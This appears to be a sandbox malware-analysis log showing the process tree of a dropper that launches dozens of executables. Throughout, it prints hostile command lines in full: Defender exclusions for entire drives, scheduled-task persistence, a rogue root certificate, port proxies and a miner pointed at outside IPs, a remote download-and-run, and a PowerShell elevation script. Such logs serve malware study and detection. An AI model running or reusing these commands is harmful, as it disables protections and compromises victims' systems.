C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1808 --field-trial-handle=2088,i,4191304725459162765,18152923927377962037,131072 /prefetch:8
4⤵
PID:2616

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1828 --field-trial-handle=2088,i,4191304725459162765,18152923927377962037,131072 /prefetch:8
4⤵
PID:2620

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2952 --field-trial-handle=2088,i,4191304725459162765,18152923927377962037,131072 /prefetch:1
4⤵
PID:2316

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2960 --field-trial-handle=2088,i,4191304725459162765,18152923927377962037,131072 /prefetch:1
4⤵
PID:4528

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4452 --field-trial-handle=2088,i,4191304725459162765,18152923927377962037,131072 /prefetch:1
4⤵
PID:692

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4640 --field-trial-handle=2088,i,4191304725459162765,18152923927377962037,131072 /prefetch:8
4⤵
PID:4468

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3160 --field-trial-handle=2088,i,4191304725459162765,18152923927377962037,131072 /prefetch:8
4⤵
PID:96

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4780 --field-trial-handle=2088,i,4191304725459162765,18152923927377962037,131072 /prefetch:8
4⤵
PID:4984

C:\Users\Admin\AppData\Local\Temp\Files\trust12344.exe
"C:\Users\Admin\AppData\Local\Temp\Files\trust12344.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4196

C:\Users\Admin\AppData\Local\Temp\Files\fund.exe
"C:\Users\Admin\AppData\Local\Temp\Files\fund.exe"
2⤵
- Executes dropped EXE
- Modifies registry class
PID:3500

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\DriverHostCrtNet\jO3lbUgUCuGG0nAZHcS.vbe"
3⤵
PID:3344

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\DriverHostCrtNet\ELvGRxvU.bat" "
4⤵
PID:4104

C:\DriverHostCrtNet\comSvc.exe
"C:\DriverHostCrtNet\comSvc.exe"
5⤵
PID:2868

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
6⤵
PID:1128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
6⤵
PID:5040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
6⤵
PID:2496

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriverHostCrtNet/'
6⤵
PID:4804

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
6⤵
PID:4976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
6⤵
PID:3484

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
6⤵
PID:4500

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
6⤵
PID:4148

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
6⤵
PID:2348

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
6⤵
PID:2692

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
6⤵
PID:4468

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
6⤵
PID:4456

C:\Program Files (x86)\Windows Media Player\lsass.exe
"C:\Program Files (x86)\Windows Media Player\lsass.exe"
6⤵
PID:5616

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a6df463c-8fab-4b57-9741-907bd05f822e.vbs"
7⤵
PID:6040

C:\Users\Admin\AppData\Local\Temp\Files\syncUpd.exe
"C:\Users\Admin\AppData\Local\Temp\Files\syncUpd.exe"
2⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3364

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\GIECFIEGDB.exe"
3⤵
PID:4160

C:\Users\Admin\AppData\Local\Temp\GIECFIEGDB.exe
"C:\Users\Admin\AppData\Local\Temp\GIECFIEGDB.exe"
4⤵
PID:4240

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\GIECFIEGDB.exe
5⤵
PID:772

C:\Windows\SysWOW64\PING.EXE
ping 2.2.2.2 -n 1 -w 3000
6⤵
- Runs ping.exe
PID:4980

C:\Users\Admin\AppData\Local\Temp\Files\TrumTrum.exe
"C:\Users\Admin\AppData\Local\Temp\Files\TrumTrum.exe"
2⤵
- Executes dropped EXE
PID:5100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\Files\TrumTrum.exe
3⤵
PID:2004

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
4⤵
PID:3008

C:\Users\Admin\AppData\Local\Temp\Files\$77_loader.exe
"C:\Users\Admin\AppData\Local\Temp\Files\$77_loader.exe"
2⤵
- Sets file execution options in registry
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:220

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lzqxtxa4.cmdline"
3⤵
PID:3492

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES368D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC368C.tmp"
4⤵
PID:4252

C:\Windows\system32\chcp.com
"C:\Windows\system32\chcp.com" 437
3⤵
PID:2076

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
3⤵
PID:6484

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
3⤵
- Gathers network information
PID:5140

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
3⤵
- Gathers network information
PID:5428

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
3⤵
- Gathers network information
PID:5504

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy reset
3⤵
PID:6552

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
3⤵
PID:6748

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=80 connectaddress=5.133.65.53
3⤵
PID:7484

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
3⤵
PID:1316

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
3⤵
PID:3852

C:\Users\Admin\AppData\Local\Temp\Files\$77_oracle.exe
"C:\Users\Admin\AppData\Local\Temp\Files\$77_oracle.exe" -o 5.133.65.54:80 --tls --http-port 888 -t 1
3⤵
PID:7972

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
3⤵
PID:8788

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
3⤵
- Gathers network information
PID:1084

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
3⤵
- Gathers network information
PID:9040

C:\Windows\system32\NETSTAT.EXE
"C:\Windows\system32\NETSTAT.EXE" -na
3⤵
- Gathers network information
PID:9076

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
3⤵
PID:8404

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=703 connectport=80 connectaddress=5.133.65.54
3⤵
PID:7184

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy show all
3⤵
PID:8056

C:\Users\Admin\AppData\Local\Temp\Files\RMS.exe
"C:\Users\Admin\AppData\Local\Temp\Files\RMS.exe"
3⤵
PID:2416

C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe
"C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe"
2⤵
PID:6580

C:\Users\Admin\AppData\Local\Temp\2224432206.exe
C:\Users\Admin\AppData\Local\Temp\2224432206.exe
3⤵
PID:4928

C:\Users\Admin\AppData\Local\Temp\257682948.exe
C:\Users\Admin\AppData\Local\Temp\257682948.exe
4⤵
PID:5052

C:\Users\Admin\AppData\Local\Temp\1047527279.exe
C:\Users\Admin\AppData\Local\Temp\1047527279.exe
5⤵
PID:8808

C:\Users\Admin\AppData\Local\Temp\102721707.exe
C:\Users\Admin\AppData\Local\Temp\102721707.exe
5⤵
PID:8720

C:\Users\Admin\AppData\Local\Temp\387624501.exe
C:\Users\Admin\AppData\Local\Temp\387624501.exe
5⤵
PID:5820

C:\Users\Admin\AppData\Local\Temp\1038416992.exe
C:\Users\Admin\AppData\Local\Temp\1038416992.exe
5⤵
PID:4340

C:\Users\Admin\AppData\Local\Temp\1644630960.exe
C:\Users\Admin\AppData\Local\Temp\1644630960.exe
4⤵
PID:6720

C:\Users\Admin\AppData\Local\Temp\773416145.exe
C:\Users\Admin\AppData\Local\Temp\773416145.exe
4⤵
PID:2824

C:\Users\Admin\AppData\Local\Temp\2888013479.exe
C:\Users\Admin\AppData\Local\Temp\2888013479.exe
4⤵
PID:6548

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c shutdown /r
5⤵
PID:3300

C:\Users\Admin\AppData\Local\Temp\Files\TJeAjWEEeH.exe
"C:\Users\Admin\AppData\Local\Temp\Files\TJeAjWEEeH.exe"
2⤵
PID:5580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
3⤵
PID:6392

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "CNSWA" /tr "C:\ProgramData\Chrome\CNSWA.exe"
3⤵
PID:7744

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "CNSWA" /tr "C:\ProgramData\Chrome\CNSWA.exe"
4⤵
- Creates scheduled task(s)
PID:8144

C:\Users\Admin\AppData\Local\Temp\Files\cp.exe
"C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"
2⤵
PID:5260

C:\Users\Admin\AppData\Local\Temp\Files\new1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\new1.exe"
2⤵
PID:5236

C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
2⤵
PID:5248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA090.tmp.bat""
3⤵
PID:5712

C:\Windows\system32\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:6724

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
4⤵
PID:6048

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
5⤵
PID:6716

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
6⤵
- Creates scheduled task(s)
PID:6008

C:\Users\Admin\AppData\Local\Temp\Files\RtkAudBCK.exe
"C:\Users\Admin\AppData\Local\Temp\Files\RtkAudBCK.exe"
2⤵
PID:5452

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" powershell -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Control.exe
3⤵
PID:5112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Control.exe
4⤵
PID:2652

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" powershell -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Anyns.exe
3⤵
PID:6208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Anyns.exe
4⤵
PID:4504

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" powershell -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Header.exe
3⤵
PID:6568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Header.exe
4⤵
PID:8000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\Files
3⤵
PID:6560

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\Files
4⤵
PID:7876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" powershell -Command Add-MpPreference -ExclusionPath C:\ProgramData\Microsoft\Diagnosis\
3⤵
PID:6176

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\ProgramData\Microsoft\Diagnosis\
4⤵
PID:6672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" powershell -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Taskhost.exe
3⤵
PID:5644

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Taskhost.exe
4⤵
PID:360

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" powershell -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Runtime.exe
3⤵
PID:2348

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Runtime.exe
4⤵
PID:8084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" powershell -Command Add-MpPreference -ExclusionPath C:\ProgramData\Microsoft\Diagnosis\Sideload\
3⤵
PID:5176

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\ProgramData\Microsoft\Diagnosis\Sideload\
4⤵
PID:7360

C:\Windows\SYSTEM32\certutil.exe
"certutil.exe" -addstore root C:\ProgramData\Microsoft\Diagnosis\Sideload\rtt.cer
3⤵
PID:5612

C:\ProgramData\Microsoft\Diagnosis\Microsoft.ServiceHub.Control.exe
"C:\ProgramData\Microsoft\Diagnosis\Microsoft.ServiceHub.Control.exe"
3⤵
PID:7380

C:\ProgramData\Microsoft\Diagnosis\Microsoft.ServiceHub.Anyns.exe
"C:\ProgramData\Microsoft\Diagnosis\Microsoft.ServiceHub.Anyns.exe"
3⤵
PID:8804

C:\ProgramData\Microsoft\Diagnosis\Microsoft.ServiceHub.Header.exe
"C:\ProgramData\Microsoft\Diagnosis\Microsoft.ServiceHub.Header.exe"
3⤵
PID:7216

C:\ProgramData\Microsoft\Diagnosis\Sideload\Microsoft.ServiceHub.Taskhost.exe
"C:\ProgramData\Microsoft\Diagnosis\Sideload\Microsoft.ServiceHub.Taskhost.exe"
3⤵
PID:6444

C:\Users\Admin\AppData\Local\Temp\Files\goldprime123.exe
"C:\Users\Admin\AppData\Local\Temp\Files\goldprime123.exe"
2⤵
PID:6704

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:4936

C:\Users\Admin\AppData\Local\Temp\Files\TrueCrypt_nKJqAu.exe
"C:\Users\Admin\AppData\Local\Temp\Files\TrueCrypt_nKJqAu.exe"
2⤵
PID:5364

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"
3⤵
PID:5612

C:\Users\Admin\AppData\Local\Temp\Files\swiiiii.exe
"C:\Users\Admin\AppData\Local\Temp\Files\swiiiii.exe"
2⤵
PID:3292

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6920

C:\Users\Admin\AppData\Local\Temp\Files\Tweeter%20Traffic.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Tweeter%20Traffic.exe"
2⤵
PID:5668

C:\Users\Admin\AppData\Local\Temp\Files\Opera_109.0.5097.38_Autoupdate_x64.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Opera_109.0.5097.38_Autoupdate_x64.exe"
2⤵
PID:7080

C:\Users\Admin\AppData\Local\Temp\Files\Ledger-Live.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Ledger-Live.exe"
2⤵
PID:5148

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\Files\Ledger-Live.exe
3⤵
PID:7244

C:\Windows\SysWOW64\PING.EXE
ping 2.2.2.2 -n 1 -w 3000
4⤵
- Runs ping.exe
PID:7576

C:\Users\Admin\AppData\Local\Temp\Files\zxcvb.exe
"C:\Users\Admin\AppData\Local\Temp\Files\zxcvb.exe"
2⤵
PID:6760

C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe
"C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe"
2⤵
PID:5132

C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe
"C:\Users\Admin\AppData\Local\Temp\Files\User%20OOBE%20Broker.exe"
3⤵
PID:7000

C:\Users\Admin\AppData\Local\Temp\Files\LoaderAVX.exe
"C:\Users\Admin\AppData\Local\Temp\Files\LoaderAVX.exe"
2⤵
PID:2268

C:\Users\Admin\AppData\Local\Temp\Files\control.exe
"C:\Users\Admin\AppData\Local\Temp\Files\control.exe"
2⤵
PID:5652

C:\Users\Admin\AppData\Local\Temp\Files\elevator.exe
"C:\Users\Admin\AppData\Local\Temp\Files\elevator.exe"
2⤵
PID:7852

C:\Users\Admin\AppData\Local\Temp\Files\ISetup10.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ISetup10.exe"
2⤵
PID:3964

C:\Users\Admin\AppData\Local\Temp\Files\setup.exe
"C:\Users\Admin\AppData\Local\Temp\Files\setup.exe"
2⤵
PID:7732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # Elevate privileges if (-not (IsAdministrator)) { $proc = New-Object System.Diagnostics.Process $proc.StartInfo.WindowStyle = 'Hidden' $proc.StartInfo.FileName = [System.Diagnostics.Process]::GetCurrentProcess().MainModule.FileName $exclusionPaths = '${env:ProgramData}','${env:AppData}','${env:SystemDrive}\\' $proc.StartInfo.Arguments = '-Command "Add-MpPreference -ExclusionPath ""' + ($exclusionPaths -join ',') + '"""' $proc.StartInfo.UseShellExecute = $true $proc.StartInfo.Verb = 'runas' $proc.StartInfo.CreateNoWindow = $true try { $proc.Start() | Out-Null $proc.WaitForExit() | Out-Null [Environment]::Exit(1) } catch [System.ComponentModel.Win32Exception] { if ($AdminRightsRequired) { continue } else { break } } } else { break } } } function IsAdministrator { $identity = [System.Security.Principal.WindowsIdentity]::GetCurrent() $principal = New-Object System.Security.Principal.WindowsPrincipal($identity) return $principal.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator) } Get-Win"
3⤵
PID:2180

C:\Users\Admin\AppData\Local\Temp\Files\cayV0Deo9jSt417.exe
"C:\Users\Admin\AppData\Local\Temp\Files\cayV0Deo9jSt417.exe"
2⤵
PID:6060

C:\Windows\SysWOW64\clip.exe
"C:\Windows\SysWOW64\clip.exe"
3⤵
PID:4192

C:\Users\Admin\AppData\Roaming\System32\taskhost.exe
"C:\Users\Admin\AppData\Roaming\System32\taskhost.exe"
4⤵
PID:8328

C:\Users\Admin\AppData\Local\Temp\Files\fscan.exe
"C:\Users\Admin\AppData\Local\Temp\Files\fscan.exe"
2⤵
PID:8892

C:\Users\Admin\AppData\Local\Temp\Files\IjerkOff.exe
"C:\Users\Admin\AppData\Local\Temp\Files\IjerkOff.exe"
2⤵
PID:2436

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\BlockComponentwebMonitordhcp\AbAw8xfGFsmxdxvuwvbKubDJeV.vbe"
3⤵
PID:8996

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\BlockComponentwebMonitordhcp\8H5kf2bUK2r.bat" "
4⤵
PID:7172

C:\BlockComponentwebMonitordhcp\agentDllDhcp.exe
"C:\BlockComponentwebMonitordhcp\agentDllDhcp.exe"
5⤵
PID:8392

C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe
"C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe"
2⤵
PID:2136

C:\Users\Admin\AppData\Local\Temp\Files\WEBDOWN.EXE
"C:\Users\Admin\AppData\Local\Temp\Files\WEBDOWN.EXE" http://www.ojang.pe.kr/CALENDAR/DOWN/JEDITOR/JEDITOR.EXE "C:/Users/Admin/AppData/Local/Temp/Files/jeditor.exe" RUN
3⤵
PID:7348

C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe
C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe
4⤵
PID:8524

C:\Users\Admin\AppData\Local\Temp\Files\june.exe
"C:\Users\Admin\AppData\Local\Temp\Files\june.exe"
2⤵
PID:8744

C:\Users\Admin\AppData\Local\Temp\is-S28TD.tmp\june.tmp
"C:\Users\Admin\AppData\Local\Temp\is-S28TD.tmp\june.tmp" /SL5="$90212,3706563,54272,C:\Users\Admin\AppData\Local\Temp\Files\june.exe"
3⤵
PID:4240

C:\Users\Admin\AppData\Local\Sun Vox\sunvox.exe
"C:\Users\Admin\AppData\Local\Sun Vox\sunvox.exe" -i
4⤵
PID:2628

C:\Users\Admin\AppData\Local\Sun Vox\sunvox.exe
"C:\Users\Admin\AppData\Local\Sun Vox\sunvox.exe" -s
4⤵
PID:7440

C:\Users\Admin\AppData\Local\Temp\Files\alexxxxxxxx.exe
"C:\Users\Admin\AppData\Local\Temp\Files\alexxxxxxxx.exe"
2⤵
PID:7520

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6584

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6620

C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"
4⤵
PID:8856

C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"
4⤵
PID:7860

C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\Files\xmrig.exe"
2⤵
PID:6568

C:\Users\Admin\AppData\Local\Temp\Files\net.exe
"C:\Users\Admin\AppData\Local\Temp\Files\net.exe"
2⤵
PID:2904

C:\Users\Admin\AppData\Local\Temp\Files\build6_unencrypted.exe
"C:\Users\Admin\AppData\Local\Temp\Files\build6_unencrypted.exe"
2⤵
PID:3524

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'build6_unencrypted.exe'
3⤵
PID:6956

C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe"
2⤵
PID:7612

C:\Users\Admin\AppData\Local\Temp\Files\hghgfhjfhmain.exe
"C:\Users\Admin\AppData\Local\Temp\Files\hghgfhjfhmain.exe"
2⤵
PID:8844

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "fgfdhdgg" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\gfgfgf\gfdgfdg.exe" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:8952

C:\Users\Admin\AppData\Local\Temp\Files\VLTKTanthuTN.exe
"C:\Users\Admin\AppData\Local\Temp\Files\VLTKTanthuTN.exe"
2⤵
PID:6128

C:\Users\Admin\AppData\Local\Temp\Files\current.exe
"C:\Users\Admin\AppData\Local\Temp\Files\current.exe"
2⤵
PID:6488

C:\Users\Admin\AppData\Local\Temp\Files\555.exe
"C:\Users\Admin\AppData\Local\Temp\Files\555.exe"
2⤵
PID:2968

C:\Users\Admin\AppData\Local\Temp\Files\KB824105-x86-ENU.exe
"C:\Users\Admin\AppData\Local\Temp\Files\KB824105-x86-ENU.exe"
2⤵
PID:6820

C:\Windows\SysWOW64\cmd.exe
"cmd" /c net use
3⤵
PID:5568

C:\Users\Admin\AppData\Local\Temp\Files\net.exe
net use
4⤵
PID:8828

C:\Users\Admin\AppData\Local\Temp\Files\fullwork.exe
"C:\Users\Admin\AppData\Local\Temp\Files\fullwork.exe"
2⤵
PID:7764

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6208

C:\Users\Admin\AppData\Local\Temp\Files\poolsdnkjfdbndklsnfgb.exe
"C:\Users\Admin\AppData\Local\Temp\Files\poolsdnkjfdbndklsnfgb.exe"
2⤵
PID:6584

C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
"C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"
2⤵
PID:5720

C:\Users\Admin\AppData\Local\Temp\Files\Mtkfarukc.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Mtkfarukc.exe"
2⤵
PID:8468

C:\Users\Admin\AppData\Local\Temp\Files\RDX.exe
